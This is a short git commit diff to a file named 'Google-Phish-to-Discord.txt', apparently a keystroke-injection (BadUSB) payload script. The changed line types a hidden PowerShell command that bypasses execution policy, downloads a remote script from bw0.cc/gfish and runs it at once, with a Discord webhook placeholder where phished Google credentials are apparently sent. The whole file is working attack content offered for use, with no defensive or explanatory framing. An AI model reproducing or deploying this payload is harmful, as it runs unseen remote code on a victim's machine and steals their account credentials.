Update Google-Phish-to-Discord.txt

This commit is contained in:
egieb
2025-06-18 15:11:11 +00:00
committed by GitHub
parent 7a0dcf34dd
commit 0fb9b7e132

View File

@@ -14,7 +14,7 @@ REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -w h -NoP -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; irm https://bw0.cc/gfish | iex
STRING powershell -w h -Ep Bypass -C $dc='DISCORD_WEBHOOK_HERE'; iex (irm bw0.cc/gfish)
ENTER